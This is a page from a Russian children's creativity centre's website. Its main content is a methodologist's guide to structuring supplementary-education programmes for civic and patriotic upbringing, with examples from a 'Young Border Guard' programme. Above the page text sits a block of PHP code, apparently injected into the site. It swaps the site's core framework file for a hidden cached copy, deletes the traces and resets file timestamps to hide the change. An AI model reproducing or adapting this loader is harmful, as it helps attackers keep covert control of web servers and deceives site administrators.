$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Методика составления образовательной программы по гражданскому и патриотическому воспитанию
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Февраль 2018
Пн Вт Ср Чт Пт Сб Вс
29 30 31 1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 1 2 3 4
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

Методика составления образовательной программы по гражданскому и патриотическому воспитанию PDF Печать E-mail
Автор: Кристина   
31.10.2017 14:47

 

Областной конкурс методических материалов «Педагогический поиск»

 

Номинация «Методические рекомендации»

Тематика «Гражданское и духовно-нравственное воспитание детей»

 

Тема работы: Методика составления образовательной программы по гражданскому и патриотическому воспитанию

Подготовила:

Решетова Татьяна Владимировнаметодист 1 категории

 

 

 

 

Оглавление

 

Обоснование проблемы……………………………………….....3

Сущность образовательной программы…………….………..4

Структура программы…………………………………………….6

Комплекс основных характеристик программы……………...7

Комплекс организационно-педагогических условий……….15

Модель реализации программы………………………………24

Модель гражданина и патриота……………………………….24

Приложение…………………………………………….………..26

 

 

          1.Обоснование проблемы

 

   Патриотизм - фундамент общества, цементирующая основа существования и развития наций, государства, особая направленность самореализации и социального поведения граждан,  критериями для которых являются любовь и служение Отечеству, обеспечение целостности и суверенитета России, ее национальная безопасность, устойчивое развитие, долг и ответственность, предполагающие приоритет общественных и государственных начал над индивидуальными  интересами и устремлениями и выступающие как высший смысл жизни и деятельности личности всех социальных групп и слоев общества.

События последних лет свидетельствуют о том, что экономическая дезинтеграция, социальная дифференциация общества, девальвация духовных ценностей оказывают негативное влияние на общественное сознание большинства социальных и возрастных групп населения, ослабляют воспитательное воздействие культуры, искусства и образования как важнейших факторов формирования патриотизма. В общественном сознании получили распространение равнодушие, эгоизм, цинизм, немотивированная агрессивность, неуважительное отношение к государству и социальным институтам. Появилась тенденция падения престижа военной и государственной службы.

Одной из главных задач «Концепции модернизации образования» является воспитание гражданина — патриота России. Актуальность гражданско-патриотического воспитания вызвана значительными изменениями у современной молодежи в отношениях к таким непреходящим ценностям, как Отечество, патриотизм, верность героическим традициям, сохранение памяти павших за Родину; долг, честь, достоинство, знание истории своего народа, малой родины. В этих условиях возрастает необходимость гражданского и патриотического образования и воспитания.    В школах нашего  района  разработаны и реализуются программы гражданско-правового патриотического  образования, которые способствуют выполнению основной задачи «Концепции модернизации образования».

     С целью проведения единой государственной политики в области патриотического воспитания, координации усилий по патриотическому воспитанию Российских органов власти, органов местного самоуправления, общественных организаций подготовлены Государственная программа «Патриотическое воспитание граждан Российской Федерации на 2016-2020 годы», целевая региональная программа «Патриотическое воспитание и допризывная подготовка граждан Оренбургской области» на 2017-2020 годы и локальная программа «Патриотическое воспитание и допризывная подготовка граждан Новосергиевского района» на 2017-2020 годы создающие прочную основу для достижения целей патриотического воспитания.

Все эти программы ориентированы на потребности учащихся, учителей, школы, родителей.

 

 

 

  1. 2.Сущность образовательной программы

Образовательная программа – это документ, в котором фиксируется и аргументировано представляется цель учебного процесса, учебный план и календарный учебный график, способы и методы их реализации, критерии оценки результатов в условиях конкретного образовательного учреждения.

    Уровень образовательной программы – это показатель ее полноты и качества в создании условий для достижения личностью определенного уровня образованности, системной организованности образовательного процесса в учреждении по обеспечению всего спектра условий, освоение обучающимися  всех уровней образованности.

Специфика деятельности дополнительного образования, состоит в том, что ребенок вправе выбирать любой вид деятельности, заниматься сразу в двух-трех различных группах и не обязан посещать каждое занятие. И только от мастерства педагога и от того, насколько хорошо продумана программа будет зависеть эффективность деятельности педагога, а также наполняемость групп, т. е. заинтересованность ребенка.

Программа дает возможность всем участникам деятельности представить цель и задачи совместных действий на каждом временном отрезке. В то же время программа указывает путь к достижению поставленной цели, определяет промежуточные результаты, что дает возможность педагогу быстро реагировать на изменение ситуации, оперативно корректировать педагогический процесс, своевременно вносить изменения в методику работы.

В программе фиксируется и логически выстраивается перспектива развития, определяются проблемы, обосновываются цель, задачи и тематическое планирование, приводятся критерии оценки освоения воспитанниками предлагаемых образовательных программ.

Необходимость составления программы повышает требования  к подготовке самого педагога, требует умения представить свою деятельность в виде программы.

С одной стороны, педагог может использовать любую опубликованную программу, адаптировать ее к собственным условиям, может составить свою программу из нескольких, может разработать собственную — авторскую — программу. Но, с другой стороны, и другие педагоги могут использовать эту программу. Следовательно, в обоих случаях программа  должна быть продуманной, объемной, логичной и содержательной, должно быть ясно, что и почему следует делать. В нашей работе по составлению программы мы, в основном, опираемся на Государственные требования к содержанию дополнительных  образовательных программ (Письмо Минобрнауки РФ от 18.11.2015 г. № 09-3242 «О направлении рекомендаций» (вместе Методические рекомендации по проектированию дополнительных общеразвивающих программ).

Программы педагогов дополнительного образования в значительной степени отличаются от образовательных программ любого учебного учреждения. Следует, однако, различать программы, приближающиеся к базовым и лишь несколько расширяющие их, и программы деятельности, выходящей за пределы базового образования (типа «хобби»).

Целостность образовательного процесса конкретизируется и цели, которые определяет связь, как с содержанием, так и с методами и организационными формами педагогической деятельности. При наличии такой взаимосвязи цель приводит в действие средства ее осуществления. Образуется система отношений «цель — средства — результат», при которых и осуществляются взаимодействие, взаимосвязь и взаимозависимость элементов педагогического процесса.

     Образовательная программа должна чётко и ясно представлять своеобразные особенности педагогической системы и те образовательные возможности, которые интересны или могут стать в будущем привлекательными для детей и родителей. Содержание образовательной программы не может оставаться в неизменном виде и быть тем «отстранённым документом», который создаётся формально раз и навсегда.      

      Изменение в обществе, в системе образования в связи со становлением его вариативности, появления инновационных педагогических систем и новых видов учреждений образования оказывают существенное влияние на  цели и задачи, а значит и содержание самой программы.  Однако в содержании этого документа всегда должны сохраняться те основы, которые отвечают его главному предназначению – миссии.

     Образовательная программа патриотического и гражданского воспитания на основе социального партнерства призвана выполнить следующие функции:

  • Интегрирующую: содействие соединению в одно целое усилий ОУ и всех субъектов социальных институтов воспитания по созданию благоприятных условий для образования и воспитания детей и подростков;
  • Регулирующую: она связана с упорядочиванием общей системы работы образовательного учреждения с родителями, населением села, институтами социального воспитания;
  • Защитную: направлена на комплексное изучение семей, среды воспитания и обеспечение социально-значимой деятельности;
  • Корректирующую: осуществление психолого-педагогической коррекции проблемных ситуаций воспитания детей в семье, поведения в общественных местах, наличие вредных привычек.

 

Таким образом, складывается определенная схема построения программы, ее структура. В общем виде программа состоит из двух основных разделов:

  1. 1.Комплекс основных характеристик программы;
  2. 2.Комплекс организационно-педагогических условий.

     При разработке программы на несколько лет структура программы усложняется в основном за счет повторения учебного плана, его содержания и календарного учебного графика.

Предложенная последовательность структурных компонентов программы является обязательной. Объем каждого раздела программы может быть различным. В программе могут быть добавлены приложения различного характера (творческий сценарий мероприятия, предложения по созданию иллюстративного материала тематики занятий, методические разработки для организации индивидуальной работы с детьми и т. д.).

 

  1. 3.Структура дополнительной общеобразовательной общеразвивающей программы.

Титульный лист программы

Поскольку программа — это, прежде всего документ, выполняющий различные функции (как основание для оплаты труда педагога, как характеристика его профессионального уровня, как «теория данного педагога, предлагаемая для образования и развития его обучающихся), то и оформляться он должен соответственно требованиям.

На титульной странице любого типа рукописи (печатного, компьютерного или рукописного исполнения) и на всех остальных страницах обязательно соблюдаются поля. Размер шрифта  TimesNewRoman кеглем 14, через 1,5 интервала.

Титульный лист включает следующие элементы заполнения:

− наименование вышестоящих органов образования (по подчиненности учреждения, организации);

− наименование учреждения, организации (согласно формулировке устава организации);

− дата и № протокола экспертного совета, рекомендовавшего программу к реализации;

− гриф утверждения программы (с указанием ФИО руководителя, даты и номера приказа);

− название программы;

- направленность программы;

− адресат программы;

- срок реализации программы;

− ФИО, должность разработчика (-ов) программы;

− Место (город, другой населенный пункт) и год разработки программы.

Программа считается принятой к работе, утвержденной с момента ее подписи директором, подтвержденной печатью.

Нумерация страниц текста начинается со 2 (или 3-4), но только с той, на которой начинается собственно текст работы. Цифра страницы текста ставится в середине верхнего поля по вертикали и по горизонтали без точек или тире.

 

Раздел №1. «Комплекс основных характеристик программы».

1.1 Пояснительная записка

Этот раздел направлен на отражение общей характеристики программы:

 - направленность программы. Духовно-нравственное и гражданско-патриотическое воспитание, социальная адаптация, развитие патриотических чувств, раскрытие творческого потенциала детей – это основные задачи программ социально-педагогической направленности. Такие программы создают твердую почву для национального самосознания, гражданской позиции, дают возможность почувствовать себя частью богатейшей истории страны, возвращают современному поколению его подлинное историческое прошлое и накопленное веками духовные ценности.

- актуальность программы – своевременность, необходимость, соответствие потребностям времени. Не следует пускаться в политическую или социальную демагогию, доказывая сиюминутную насущность вашей работы. Следует кратко обосновать сущность сложившейся ситуации, выходы на социальную действительность и потребности ребенка.

-отличительные особенности программы – основные идеи, отличающие программу от уже существующих программ по данному направлению.

         -адресат программы – краткая характеристика обучающихся по программе, возрастные особенности, иныемедико-психолого-педагогические характеристики обучающихся в данном объединении. Возрастные особенности указываются только те, которые непосредственно связаны с видом деятельности.

- объем и срок освоения программы – общее количество учебных часов, запланированных на весь период обучения и необходимых для освоения программы; определяется содержанием и прогнозируемыми результатами программы; характеризуется продолжительностью программы.

Например, программа «Юный пограничник» рассчитана на три года обучения и реализуется в объеме 432 часа.

- формы обучения – очная форма обучения. Основными формами образовательного процесса являются: учебно- тренировочные занятия, спортивно-туристические соревнования, экскурсии, конкурсы, фотовыставки, презентации проектов, караульная служба «Пост №1».

- особенности организации образовательного процесса – в соответствии с индивидуальными учебными планами в объединениях по интересам. Например, групповая и индивидуальная работа,  виды занятий -  беседа,  практические занятия, экскурсии, тематические праздники, соревнования, выполнение самостоятельной работы, разработка проектов.

- режим занятий, периодичность и продолжительность занятий – общее количество часов в год; количество часов и занятий в неделю; периодичность и продолжительность занятий. Например, первый год – 144 часа, второй год - 144 часа, третий год – 216 часов. Летние зачетные занятия, лагерь «Орленок» патриотическая смена (несение караульной службы «Пост №1») в сетку часов не включены.

Занятия проводятся с сентября по май включительно. По программе учебное занятие составляет 2 академических часа с 10-минутным перерывом. I и II годы обучения – 2 раза в неделю по 2 часа; III - год обучения – 3 раза в неделю по 2 часа. Продолжительность одного академического часа 45 минут.

 

1.2 Цель и задачи программы

Цель - это заранее предполагаемый результат образовательного процесса, к которому надо стремиться. При характеристике цели следует избегать общих абстрактных формулировок. Цель должна быть связана с названием программы, отражать ее основную направленность и желаемый конечный результат.

Конкретизация цели осуществляется через определение задач, раскрывающих пути достижения цели. Задачи показывают, что нужно сделать, чтобы достичь цели.

Цель — это конкретный, охарактеризованный качественно, а где можно, то и количественно, образ желаемого (ожидаемого) результата, который программа реально может достичь к четко определенному моменту времени.

Формулировка цели должна быть максимально четкой и краткой, полной и логически корректной. Ее назначение — определить стратегию и тактику образовательного процесса.

Цель - понятие, выражающее идеальное предвосхищение результата образовательной программы. Сама образовательная программа в этом плане трактуется как процесс осуществления цели.

В то же время содержание само по себе может рассматриваться как цель по отношению к методам и формам. В этом случае система методов и организационных форм становится средством реализации этой цели.

- задачи:

1. воспитывающие -  должны соотносится с личностным результатом;

2. развивающие - должны соотносится с метапредметным результатом;  

3. образовательные - должны соотносится с предметным результатом; 

Формулировки задач должны быть соотнесены с прогнозируемыми результатами.

Хорошо продуманная программа, правильно определенные цель и задачи, позволяют педагогу без осложнений пройти путь от механического подчинения ребенка своему авторитету к завоеванию добровольного признания; от авторитарного педагога к педагогу-товарищу, умелому и опытному; к педагогу — организатору детской самодеятельности и активности; от учителя, который учит к педагогу, который консультирует, инструктирует, помогает в самостоятельной работе и вооружает методами самостоятельного приобретения знаний.

Определив конечную цель, следует решить, что необходимо делать в частности: сформулировать конкретные цели и задачи, которые решаются последовательно из года в год. Однако точно поставить цель без предварительного, хотя бы краткого, анализа образовательного уровня детей группы, особенностей контингента в целом, особенностей окружающей среды, вашего региона — затруднительно. Чем объемнее программа, тем глубже должен быть анализ.

Главное — должно быть понятно, для чего создана данная программа, и какие результаты хотел бы получить педагог. В конечном счете, результат воспитания зависит от того, какая была поставлена цель и насколько точно и полно она отражена вкаждом этапе деятельности педагога.

Сформулированная общая цель программы составляет его стратегию и потому требует постановки конкретных тактических задач. В отличие от цели, которая должна быть одна, задач должно быть несколько. В совокупности они образуют общую тактику реализации поставленной цели, а по отдельности представляют собой последовательные шаги продвижения к ней.

Достижение  цели образовательной программы по гражданско-патриотическому воспитанию  связано с решением ряда задач:

-        утверждение в обществе, и чувствах учащихся социально значимых патриотических ценностей, взглядов и убеждений, уважение к культурному и историческому прошлому России,  к традициям, повышение престижа государственной, особенно военной службы;

-        развитие проектной деятельности учащихся, связанных с решением социально-экономических, культурных, экологических и других проблем;

-        воспитание учащихся в духе уважения к Конституциям РФ, к нормам общественной и социальной жизни;

-        привитие учащимся чувства гордости, глубокого уважения и почитания государственных символов РФ, исторических святынь Отечества;

-        привлечение традиционных для России региональных конфессий для формирования у учащихся патриотизма, потребности служения Родине, ее защиты как высшего духовного долга;

-        адресная работа со СМИ;

-        учет регионального компонента, формирование расовой, национальной, религиозной терпимости, развитие дружбы между народами;

-        усиление взаимодействия семьи, школы, местной администрации. 

 

Педагог не свободен в выборе цели, конечных результатов. Они определяются обществом и должны способствовать осуществлению социальной преемственности поколений. Конкретные педагогические задачи выдвигает сам педагог, исходя из объективных условий, решает их нестандартно, поскольку эта деятельность по управлению другой деятельностью должна стать целью и педагога и ребенка. Достижение цели педагога отсрочено, задачи — в настоящем, поэтому всегда конкретны.

Педагог должен научить детей приемам самостоятельно работы, сформировать культуру, научит: работать сообща, помогая друг другу; помочь приобрести различные трудовые навыки.

1.3 Содержание программы

Содержание программы должно быть отражено в учебном плане и содержании учебно-тематического плана.

Учебный план (УП) содержит следующие обязательные элементы - перечень, трудоемкость, последовательность и распределение по периодам обучения учебных предметов, курсов, дисциплин (модулей), тем, практики, иных видов учебной деятельности и формы аттестации обучающихся (Закон № 273- ФЗ, ст. 2, п. 22; ст. 47, п. 5)

 

Публикуемые в последнее время программы и рекомендации по их разработке чаще всего не содержат учебного плана. Однако педагогу очень важно знать сколько времени (занятий) отводится на каждый отдельный раздел или тему. Собственно, именно объемом материала, предлагаемого обучающимся за то или иное количество занятий, могут отличаться две программы разных педагогов (например, по ИЗО), даже в одном и том же учреждении.

Общий объем времени по плану определяется количеством рабочих недель в учебном году: 36 недель по 6 часов —216 часов. Для младших групп и начинающих детей обычно объем времени определяется в 144 часа. Именно это время и должно составлять учебный план.

В программе педагога дополнительного образования учебный план последовательно конкретизируется в содержании учебного плана, методических рекомендациях. Такое построение особенно удобно, если программа рассчитана на несколько лет, поскольку эти программы могут значительно видоизменяться в зависимости от направленности и времени реализации.

В учебном плане может содержаться всего несколько (3-6 разделов). По годам они могут проходить «насквозь» — от первого до последнего года. Некоторые разделы могут начинаться, например, со 2-го года, а некоторые заканчиваться в 1-м или 2-м году. По распределению в программе разделов уже видна логика и изложения материала и специфика данной программы.

В плане хорошо видно, как от года к году меняется нагрузка, заканчиваются одни и добавляются другие разделы по мере освоения программы

 

№ п/п

Название раздела, темы

Количество часов

Формы аттестации/

контроля

Всего

Теория

Практика

- содержание учебного плана - реферативное описание разделов и тем программы в соответствии с последовательностью, заданной учебным планом, включая описание теоретических и практических частей и форм контроля по каждой теме; должен соответствовать целеполаганию и прогнозируемым результатам освоения программы.

При оформлении содержания следует придерживаться ряда общих правил:

− содержание составляется согласно УП;

− формулировка и порядок расположения разделов и тем должны полностью соответствовать их формулировке и расположению в УП;

− необходимо соблюдать деление на теорию и практику по каждому разделу (теме);

− материал следует излагать назывными предложениями;

− содержание каждого года обучения оформлять отдельно;

− в содержании могут размещаться ссылки на приложения (например, на правила выполнения упражнений, репертуар и т.п.);

− в содержании могут быть представлены вариативные образовательные маршруты.

Например, Раздел 1. Общая физическая подготовка (ОФП)

Теория: Понятие ОФП. Функции ОФП.

Практика: Освоение навыков физической подготовки: бег по прямой, бег приставными шагами, бег с высоко поднятыми коленями, челночный бег, кувырки вперед и назад, приседания на месте, прыжки вверх и др.

Эстафета. Спортивные игры.

В разделе Содержание учебного план следует поместить самое необходимое, поскольку раскрываемая тема являете сравнительно узкой. В текст следует вносить только то, что непосредственно связано с вашей темой. Все остальное не должно занимать места в ограниченном объеме этого раздела Может быть, более уместным будет детальное раскрытие тем в методических рекомендациях.

С другой стороны, в тексте следует указать тот путь, которым ребенок будет следовать в информационном пространстве.

Материал в этом разделе может подаваться двояко. Либо в хронологическом порядке, начиная с теоретических положений или образцов, появившихся раньше других по времени, кончая наиболее современными, свежими, либо в логическом порядке, диктуемом историей развития данного вида деятельности. В этом случае хронологический порядок может быть нарушен. Логический порядок предпочтительнее, поскольку лучше работает на общее раскрытие темы.

При оформлении текста не следует опускать названий разделов и тем, т. к. это значительно осложняет восприятие текста программы, заставляет постоянно обращаться к учебно-тематическому плану. Объем каждой темы может быть не указан, поскольку в этой части раскрывается содержание.

В содержании тем может быть дано лишь логическое перечисление информативных блоков, указывающих границы и варианты выбранного материала. Более опытные педагоги дают достаточно развернутый текст по каждой теме, группируя материал по разделам, или приводят дополнительные планы-схемы, помогающие понять логику освоения программы. Особенно если на занятиях могут переплетаться разные виды деятельности, например: изобразительная деятельность и танец.

Каждый пункт календарного учебного графика может быть конспективно раскрыт, и таким образом создается представление о том объеме и содержании знаний, которые даются на занятиях, об организационной форме занятия, методах работы педагога. Кроме того, в содержании могут приводиться примеры занятий-игр, планы конкурсов, тесты, то есть те формы работы, которые позволяют детям наиболее эффективно освоить материал.

Эффективность занятия обеспечивается хорошей организацией самостоятельной деятельности детей. Педагог должен научить детей приемам самостоятельной работы, сформировать культуру труда и научить работать сообща, помогая друг другу. Непременная составная часть эффективного занятия — гибкая неформальная система контроля, органично вплетающаяся в каждый его этап.

Эта часть программы, критерии оценки освоения материала детьми, насколько обязательна и важна, настолько и сложна в реализации.

1.4 Планируемые результаты

В этой части необходимо сформулировать:

− требования к знаниям и умениям, которые должен приобрести обучающийся в процессе занятий по программе (т.е. что он должен знать и уметь);

− компетенции и личностные качества, которые могут быть сформированы и развиты у детей в результате занятий по программе;

− личностные, метапредметные и предметные результаты, которые приобретет обучающийся по итогам освоения программы.

Данные характеристики формулируются с учетом цели и содержания программы.

Например, В программе «Юный пограничник» сложилась система мониторинга результативности освоения обучающимися программы. Цель мониторинга: выявление соответствия реальных результатов образовательного процесса прогнозируемым результатам реализации образовательной программы.

 Для определения уровня освоения программы применяются следующие формы:

- Входная диагностика, текущая диагностика, итоговая диагностика, включающая

Теоретическая подготовка ребенка: Теоретические знания (по основным разделам учебно-тематического плана программы), Практическая подготовка ребёнка: практические умения и навыки, предусмотренные программой (по основным разделам учебного  плана программы). Учебно-коммуникативные умения: умение слушать и слышать педагога, умение выступать перед аудиторией 

- Участие в туристических   слетах, несение караульной службы, учебно-тренировочных походах, выставках и конкурсах различного уровня (муниципальные туристические соревнования в закрытом помещении, соревнования по спортивному ориентированию, соревнования по велотуризму, защита исследовательских работ и социальных проектов, фотоконкурсы, Этнографическая исследовательская конференция;

Результаты обработанных данных заносятся в индивидуальную карту освоения обучающимися дополнительной общеобразовательной общеразвивающий программы «Юный пограничник»

Результаты освоения данной программы обучающимися отслеживаются на трех уровнях. 

 

Личностный уровень

1 год обучения

2 год обучения

3 год обучения

Методы и методики

-                        интерес и мотивация к занятиям НВП;

-                        уважительное отношение к природе;

-                        стремление овладеть навыками сотрудничества со сверстниками и взрослыми;

-                        осознание себя частью коллектива;

ориентация на позитивные взаимоотношения с участниками коллектива и педагогом.

-                        устойчивая мотивация и личная заинтересованность в занятиях НВП;

-                        проявление гражданской идентичности, чувства гордости за свою Родину, российский народ, историю;

-                        понимание причин успешности в спортивной деятельности;

-                        проявление трудолюбия, настойчивости при достижении цели;

-                        ориентация в сфере нравственных отношений;

- проявление уважительного отношения к старшему поколению.

-                        ценностное отношение к природному наследию;

-                        соблюдает нормы экологического и общественного поведения;

-                        стремиться к здоровому образу жизни, росту спортивного мастерства;

-                        проявление дисциплинированности, трудолюбия и упорства в достижении целей;

восприятие туризма как источника сохранения здоровья.

Диагностика достижений обучающихся наблюдение;

- участие в конкурсах различного уровня.

Метапредметный уровень

1 год обучения

2 год обучения

3 год обучения

Методы и методики

-                        способность к целеполаганию и планированию;

-                        умение подчинять свои действия задачам коллектива;

-                        владение простыми способами поиска информации с использованием предложенных педагогом источником;

-                        способность устанавливать контакт со сверстниками и взрослыми;

-                        умение договариваться и планировать в совместной спортивной деятельности;

-                        принимает и сохраняет учебную задачу;

-                        адекватно воспринимает оценку педагога, прислушивается к мнению сверстников;

-                        осуществляет анализ информации с выделением существенных признаков;

-                        умеет согласовывать свои действия с общими задачами коллектива;

-                        осуществляет познавательную деятельность с использованием различных средств коммуникации и информации;

умеет формулировать собственную точку зрения.

-                        имеет навык контроля и рефлексии;

-                        умеет согласовывать свои действия с общими задачами коллектива;

-                        умеет устанавливать деловые отношения со сверстниками для решения спортивных задач;

-                        умеет осуществлять познавательную деятельность с использованием различных средств коммуникации и информации;

формулирует собственную позицию и мнение, учитывает мнение других.

собеседование;

наблюдение;

-защита проектов;

-защита исследовательских работ.

Предметный уровень

1 год обучения

2 год обучения

3 год обучения

Методы и методики

-                         знает правила техники безопасности по профилю деятельности;

-                        знает общие вопросы экологии, туризма, истории  и географических особенностей родного края;

-                        знает историю, дни памятных дат;

-                        знает имена великих полководцев;

-                        знает основные события ВОВ;

-                        знает порядок работы на биваках;

-                        знает имена ветеранов ВОВ п.Новосергиевка;

-                        знает основы  ориентирования на местности;

-                        имеет общее представление о гигиене туриста и доврачебной медицинской помощи,

-                        знает географию и экологию своего города;

-                        знает историю своего рода;

-                        знает положение и значение города в системе региона и страны;

-                        знает биографии знаменитых земляков;

-                        умеет ориентироваться по карте и компасу;

-                        умеет передвигаться по туристским маршрутам в составе группы и преодолевать несложные естественные препятствия;

-                        умеет осуществлять движение по плану;

-                        умеет выполнять простейшие краеведческие наблюдения;

-                        умеет подготовить форму для организации караульной слубжбы;

-                        умеет оказывать элементарную медицинскую

-          знает правила  безопасного поведения  во время проведения туристско-краеведческих мероприятий;

-          знает знаменитых российских полководцев 19 века;

-          знает основные сведения по истории, культуре и географии родного края;

-          знает общие требования к разработке маршрута;

-          знает технику безопасности на занятиях по прикладной военной подготовке;

-          знает порядок действий при подготовке к трехдневным походам;

-          знает  сведения по географии, истории ВОВ;

-          знает основы команды, выполняемые при строевой подготовке;

-          знает историю «постовского» движения;

-          знает историю, географию, культуру родного края;

-          знает традиции, обычаи народов области;

-          знает знаменитых земляков;

-          знает сегодняшнее состояние области и тенденции ее развития;

-          умеет передвигаться по дорогам, тропам, пересеченной местности в составе группы;

-          умеет читать карту и ориентироваться по ней;

-          ;

-          умеет ориентироваться на местности;

-          умеет организовывать походный быт, составлять раскладку продуктов для многодневных походов;

-          умеет оказывать медицинскую

-  знает знаменитых российских полководцев 20 века;

-  знает факторы риска и факторы выживания;

-  знает правила к разработке маршрута;

-  знает правила работы с туристским снаряжением;

-  знает как правильно подать сигнал бедствия;

-  знает аварийные комплекты снаряжения;

-  правила техники безопасности по профилю деятельности;

-  знает технические и тактические основы преодоления препятсвий;

-  знает правила подготовки и организации трехдневных походов;

-  знает меры безопасности при подготовке и проведении многодневных походов и соревнований;

-  имеет общие представления о географии и истории родного края;

-       знает правила участия в туристских соревнованиях;

-       знает основные сведения по географии, истории ВОВ, Оренбургской области и Новосергиевского района;

-       знает приемы самоконтроля и доврачебной медицинской помощи в аварийных ситуациях;

-       знает условия службы в Российской армии;

-       знает основные команды, выполняемые при строевой подготовке в составе отделения;

-                        знает базовые понятия МГП;

-                        умеет передвигаться по дорогам, тропам, пересеченной местности в составе

Собеседование;

- тестирование:

- опросник «Анкета обучающегося объединения»

 (Приложение 2);

 «Я и моё объединение»

(Приложение4 );

наблюдение;

- участие в конкурсах различного уровня;

-защита проектов, исследовательских работ;

-рефлексия.


 

Раздел № 2. «Комплекс организационно-педагогических условий»

2.1 Календарный учебный график

Календарный учебный график – это составная часть образовательной программы (Закон № 273-ФЗ, гл. 1, ст. 2, п. 9), определяющая:

− количество учебных недель,

− количество учебных дней,

− продолжительность каникул,

− даты начала и окончания учебных периодов/этапов

2.1 КАЛЕНДАРНЫЙ УЧЕБНЫЙ ГРАФИК (Приложение 1)

 

 

Месяц

Число

Время проведения

Форма занятия

Количество часов

Тема занятия

Место проведения

Всего учебных недель

В календарном учебный графике представлены темы разделов и почасовое распределение материала. Это дает представление об этапах выполнения заданий и приобретении знаний. Календарный учебный график составляется на тот объем времени, который предусмотрен программой на каждый год.

Кроме того, календарный учебный график служит основанием для оплаты труда, так как до настоящего времени труд педагога оплачивается в соответствии с количеством учебных часов (академических). Существует определенная схема такого плана, однако она не является догмой. Вы видели, что даже учебный план можно при необходимости конкретизировать.

 

 

2.2 Условия реализации программы

К условиям реализации программы относится характеристика следующих аспектов:

- материально-техническое обеспечение – характеристика помещения для занятий по программе; перечень оборудования, инструментов и материалов, необходимых для реализации программы (в расчете на количество обучающихся);

Например, программа может быть успешно реализована при взаимодействии следующих ее составляющих:

МАТЕРИАЛЬНО- ТЕХНИЧЕСКОЕ ОБЕСПЕЧЕНИЕ

Для реализации  программы «Юный пограничник» творческие объединения располагает следующей материально-технической  базой:

 

Перечень обязательного оборудования и снаряжения

Кол-во (на группу 15 чел.)

 

Аптечка универсальная

 

2

 Макета 5,45 мм автомата Калашникова

4

 комплектов летней одежды

7

 комплектов зимней одежды

8

 шапок

8

 бушлатов

8

 пары берцев

3

И другие составляющие материально-техническую ценность

- информационное обеспечение – аудио-, видео-, фото-, Интернет источники;

Например,        

 - Закон РФ «Об образовании в Российской Федерации» (№273 ФЗ от 29.12.2012);

  - Концепция развития дополнительного образования детей (утв. распоряжением Правительства РФ от 4 сентября 2014 г. №1726-р)

  -  Порядок организации и осуществления образовательной        деятельности по дополнительным общеобразовательным программам (Приказ Минобрнауки РФ от 29.08.2013 г. № 1008)

  - Постановление Главного государственного санитарного врача РФ от 2 июля 2014 г. № 41 «Об утверждении СанПиН 2.4.4.3172-14 «Санитарно-эпидемиологические требования к устройству, содержанию и организации режима работы образовательных организаций ДО детей»

  - Письмо Минобрнауки РФ от 18.11.2015 г. № 09-3242 «О направлении рекомендаций» (вместе Методические рекомендации по проектированию дополнительных общеразвивающих программ)

  - Письмо Минобрнауки РФ от 14.12.2015 г. № 09-3564 «О внеурочной деятельности и реализации дополнительных общеобразовательных программ» (вместе с «Методическими рекомендациями по организации внеурочной деятельности и реализации дополнительных общеобразовательных программ»)

  - Письмо Минобрнауки РФ от 11.12.2006 г. № 06-1844 «О примерных требованиях к программам дополнительного образования детей»

          - Постановление Главного государственного санитарного врача РФ от 29 декабря 2010 г. N 189 "Об утверждении СанПиН 2.4.2.2821-10 "Санитарно-эпидемиологические требования к условиям и организации обучения в общеобразовательных учреждениях" Санитарно-эпидемиологические правила и нормативы СанПиН 2.4.2.2821-10 *"Санитарно-эпидемиологические требования к условиям и организации обучения в общеобразовательных организациях"

Электронные ресурсы

 

- кадровое обеспечение – целесообразно перечислить педагогов, занятых в реализации программы, охарактеризовать их профессионализм, квалификацию, критерии отбора.

Например, Педагоги, реализующие данную программу, обладают следующими личностными и профессиональными качествами:

- умение создать комфортные условия для успешного развития личности обучающихся;

- умение увидеть и раскрыть творческие способности обучающихся;

- постоянное самосовершенствование педагогического мастерства и повышение уровня квалификации по специальности. Все педагоги аттестованы и прошли курсы повышения квалификации. Принимают активное участие в семинарах районного и областного уровней, распространяют свой опыт обобщения на межрайонном уровне.

 

2.3 Формы аттестации (Для детей дошкольного возраста аттестация запрещена ФЗ-273)

Разрабатываются и обосновываются для определения результативности освоения программы. Призваны отражать достижения цели и задач программы. Перечисляются согласно учебному плану и учебно-тематическому плану (зачет, творческая работа, выставка, конкурс, фестиваль и др.).

Формы отслеживания и фиксации образовательных результатов: аналитическая справка, аналитический материал, аудиозапись, видеозапись, грамота, готовая работа, диплом, дневник наблюдений, журнал посещаемости, маршрутный лист, материал анкетирования и тестирования, методическая разработка, портфолио, перечень готовых работ, протокол соревнований, фото, отзыв детей и родителей, свидетельство (сертификат), статья и др.

Например, Основной формой подведения итогов обучения является участие детей в несение караульной службы «Пост№1», в туристических походах. Кроме этого, формами подведения итогов по каждому блоку и разделу программы предусмотрены следующие формы: защита исследовательских проектов, творческих работ участие воспитанников в муниципальных, областных соревнованиях, конференциях.

Промежуточными формами подведения итогов реализации программы «Юный пограничник» являются итоговые занятия. Итоговые занятия проводятся в конце каждого года обучения в форме праздника с чаепитием и приглашением родителей и учителей школы.

На итоговом занятии после третьего года обучения представляются творческие отчеты (защита проекта, творческой работы, презентация портфолио) каждым обучающимся.

Итогом  первого года обучения является суточный поход. Поход проходит с набором необходимых продуктов питания. Особенностью является отсутствие палаток и спальных мешков.

Итогом  второго года обучения является сдача нормативов по НВП.

